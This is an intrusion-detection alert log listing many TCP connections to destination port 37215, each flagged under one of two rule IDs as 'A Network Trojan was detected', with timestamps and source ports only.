                Timestamp:06/14/24-10:43:43.942140
                SID:2835222
                Source Port:59042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546729
                SID:2835222
                Source Port:54552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.907364
                SID:2835222
                Source Port:47138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.424281
                SID:2829579
                Source Port:60892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.165126
                SID:2835222
                Source Port:53158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616253
                SID:2829579
                Source Port:42252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.681414
                SID:2829579
                Source Port:52748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150721
                SID:2829579
                Source Port:42296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806126
                SID:2835222
                Source Port:58398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703025
                SID:2829579
                Source Port:56628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.030352
                SID:2835222
                Source Port:49078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411880
                SID:2835222
                Source Port:47222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503436
                SID:2835222
                Source Port:49810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201199
                SID:2829579
                Source Port:41316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779377
                SID:2835222
                Source Port:57742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917918
                SID:2835222
                Source Port:55910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074494
                SID:2835222
                Source Port:48010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.896426
                SID:2835222
                Source Port:35784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025697
                SID:2829579
                Source Port:60424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703282
                SID:2835222
                Source Port:55834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858514
                SID:2835222
                Source Port:43740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827840
                SID:2829579
                Source Port:49950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.810053
                SID:2835222
                Source Port:43670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.016630
                SID:2829579
                Source Port:54244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.449542
                SID:2835222
                Source Port:59584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149990
                SID:2829579
                Source Port:42656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277293
                SID:2829579
                Source Port:60988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324336
                SID:2829579
                Source Port:36080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614218
                SID:2829579
                Source Port:57396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518577
                SID:2829579
                Source Port:47490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.424445
                SID:2829579
                Source Port:57776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.469735
                SID:2829579
                Source Port:60764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073715
                SID:2829579
                Source Port:44506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.736440
                SID:2835222
                Source Port:35088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.699039
                SID:2829579
                Source Port:37730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295069
                SID:2835222
                Source Port:46412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274929
                SID:2835222
                Source Port:58178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.882736
                SID:2829579
                Source Port:55680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.985644
                SID:2835222
                Source Port:48886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682872
                SID:2829579
                Source Port:34558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185782
                SID:2829579
                Source Port:49350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917739
                SID:2829579
                Source Port:60180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.182806
                SID:2829579
                Source Port:32878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.813131
                SID:2829579
                Source Port:38294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.027593
                SID:2835222
                Source Port:56826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762409
                SID:2835222
                Source Port:37390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.412158
                SID:2829579
                Source Port:34510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323489
                SID:2829579
                Source Port:40918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733467
                SID:2835222
                Source Port:59772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789594
                SID:2835222
                Source Port:41140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679066
                SID:2835222
                Source Port:41390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760173
                SID:2835222
                Source Port:35728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.564212
                SID:2829579
                Source Port:58866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942557
                SID:2829579
                Source Port:47390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.625125
                SID:2835222
                Source Port:59004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761638
                SID:2835222
                Source Port:52052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763186
                SID:2835222
                Source Port:56292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411853
                SID:2829579
                Source Port:35588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766389
                SID:2829579
                Source Port:37302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660597
                SID:2829579
                Source Port:48092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916105
                SID:2829579
                Source Port:52596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.734199
                SID:2835222
                Source Port:60220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828751
                SID:2835222
                Source Port:48514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.082527
                SID:2835222
                Source Port:33998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671625
                SID:2835222
                Source Port:34048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670251
                SID:2835222
                Source Port:49656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.033228
                SID:2829579
                Source Port:58282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012304
                SID:2835222
                Source Port:54092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.933581
                SID:2829579
                Source Port:32784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779702
                SID:2829579
                Source Port:35054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760895
                SID:2835222
                Source Port:38320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.810632
                SID:2829579
                Source Port:36998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020649
                SID:2829579
                Source Port:46002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.084082
                SID:2835222
                Source Port:54982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.342296
                SID:2829579
                Source Port:47616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143302
                SID:2829579
                Source Port:50844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340827
                SID:2829579
                Source Port:42870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383949
                SID:2829579
                Source Port:44114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.015119
                SID:2829579
                Source Port:40118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718897
                SID:2835222
                Source Port:56466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804073
                SID:2835222
                Source Port:34906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979535
                SID:2835222
                Source Port:60770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.055116
                SID:2835222
                Source Port:55202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.244631
                SID:2835222
                Source Port:56566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.625410
                SID:2835222
                Source Port:40142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.022088
                SID:2835222
                Source Port:35952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.900009
                SID:2835222
                Source Port:36934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616730
                SID:2835222
                Source Port:58378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.131363
                SID:2835222
                Source Port:40890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716875
                SID:2835222
                Source Port:40572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.724673
                SID:2835222
                Source Port:55734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149186
                SID:2835222
                Source Port:49604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072495
                SID:2835222
                Source Port:53640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941027
                SID:2835222
                Source Port:46950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421426
                SID:2829579
                Source Port:47502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202062
                SID:2835222
                Source Port:51774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134472
                SID:2835222
                Source Port:59052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941790
                SID:2829579
                Source Port:40980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072660
                SID:2835222
                Source Port:59550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704931
                SID:2829579
                Source Port:35244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670295
                SID:2835222
                Source Port:48560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.765315
                SID:2829579
                Source Port:34718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735016
                SID:2829579
                Source Port:45060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.809527
                SID:2835222
                Source Port:45220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.968216
                SID:2835222
                Source Port:48082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023985
                SID:2829579
                Source Port:33800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762336
                SID:2835222
                Source Port:50272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134331
                SID:2829579
                Source Port:34778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053176
                SID:2829579
                Source Port:53352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027739
                SID:2835222
                Source Port:54634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111197
                SID:2829579
                Source Port:55538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.339428
                SID:2829579
                Source Port:37102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504295
                SID:2835222
                Source Port:41442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.934883
                SID:2829579
                Source Port:42342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151421
                SID:2835222
                Source Port:46842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827779
                SID:2835222
                Source Port:50098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132670
                SID:2835222
                Source Port:42104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.563956
                SID:2829579
                Source Port:51312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.673080
                SID:2835222
                Source Port:37732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776016
                SID:2835222
                Source Port:58448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735393
                SID:2835222
                Source Port:41600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.110762
                SID:2835222
                Source Port:38588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011347
                SID:2829579
                Source Port:51200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548523
                SID:2829579
                Source Port:38772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.689585
                SID:2829579
                Source Port:37920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943083
                SID:2829579
                Source Port:35212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943502
                SID:2829579
                Source Port:38712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812367
                SID:2829579
                Source Port:60090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.473646
                SID:2829579
                Source Port:43212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762650
                SID:2835222
                Source Port:45968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.617492
                SID:2835222
                Source Port:39290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546409
                SID:2835222
                Source Port:38474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763106
                SID:2835222
                Source Port:47526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245292
                SID:2829579
                Source Port:57806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503520
                SID:2835222
                Source Port:52552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565806
                SID:2835222
                Source Port:41102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.883013
                SID:2829579
                Source Port:54104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.294188
                SID:2835222
                Source Port:56502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421455
                SID:2829579
                Source Port:49466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134710
                SID:2829579
                Source Port:49794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.034677
                SID:2829579
                Source Port:44516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917010
                SID:2829579
                Source Port:55682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453667
                SID:2835222
                Source Port:52168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.793123
                SID:2829579
                Source Port:47510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.991113
                SID:2829579
                Source Port:58538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715763
                SID:2829579
                Source Port:41458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791733
                SID:2835222
                Source Port:50916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846918
                SID:2829579
                Source Port:39776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027491
                SID:2835222
                Source Port:55326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978656
                SID:2835222
                Source Port:50638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502481
                SID:2829579
                Source Port:50840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807550
                SID:2829579
                Source Port:60004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073344
                SID:2835222
                Source Port:55314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053337
                SID:2829579
                Source Port:47612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017508
                SID:2829579
                Source Port:59908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245947
                SID:2829579
                Source Port:59478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.031954
                SID:2835222
                Source Port:44898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186617
                SID:2835222
                Source Port:44000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849483
                SID:2835222
                Source Port:50110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018561
                SID:2835222
                Source Port:56290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.148303
                SID:2835222
                Source Port:52236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762653
                SID:2835222
                Source Port:34690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849676
                SID:2829579
                Source Port:50038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.252882
                SID:2829579
                Source Port:44620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.009911
                SID:2835222
                Source Port:46196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860372
                SID:2835222
                Source Port:34944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969655
                SID:2835222
                Source Port:37144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074308
                SID:2829579
                Source Port:46890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614369
                SID:2835222
                Source Port:52650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151795
                SID:2829579
                Source Port:52864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761361
                SID:2829579
                Source Port:44412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978763
                SID:2835222
                Source Port:32966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.148818
                SID:2835222
                Source Port:48376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914978
                SID:2829579
                Source Port:53678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701468
                SID:2829579
                Source Port:56664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879361
                SID:2835222
                Source Port:38554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811074
                SID:2835222
                Source Port:51370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.057267
                SID:2829579
                Source Port:49524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.243713
                SID:2829579
                Source Port:50350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472322
                SID:2829579
                Source Port:47232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017679
                SID:2835222
                Source Port:39846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703900
                SID:2829579
                Source Port:56558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.772579
                SID:2835222
                Source Port:41396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365783
                SID:2835222
                Source Port:33674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761745
                SID:2835222
                Source Port:37788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.699465
                SID:2829579
                Source Port:45608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682392
                SID:2829579
                Source Port:53072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979340
                SID:2835222
                Source Port:52016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979647
                SID:2829579
                Source Port:51004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.940509
                SID:2829579
                Source Port:57214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805881
                SID:2829579
                Source Port:38002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677630
                SID:2835222
                Source Port:44884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022274
                SID:2829579
                Source Port:35554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859843
                SID:2829579
                Source Port:53902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184790
                SID:2829579
                Source Port:47542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.542872
                SID:2835222
                Source Port:34608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805474
                SID:2829579
                Source Port:52800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383127
